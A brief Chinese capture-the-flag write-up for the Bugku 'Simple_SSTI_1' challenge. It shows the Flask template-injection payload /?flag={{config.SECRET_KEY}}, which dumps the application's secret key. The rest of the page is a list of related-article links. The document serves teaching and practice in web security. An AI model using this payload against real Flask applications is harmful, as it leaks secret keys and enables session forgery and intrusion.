很简单的模板注入,直接F12查看,得到提示,flag在secret_key下。

Bugku-Simple_SSTI_1(SSTI注入)

利用flask的模板注入,直接得到flag。

 /?flag={{config.SECRET_KEY}}

Bugku-Simple_SSTI_1(SSTI注入)

参考:https://blog.csdn.net/qq_46230755/article/details/114272350

相关文章:

  • 2022-02-11
  • 2021-12-22
  • 2021-06-19
  • 2021-12-29
  • 2022-02-17
  • 2021-06-15
  • 2021-11-02
  • 2021-05-05
猜你喜欢
  • 2022-12-23
  • 2022-12-23
  • 2021-06-28
  • 2021-07-27
  • 2022-12-23
  • 2022-12-23
相关资源
相似解决方案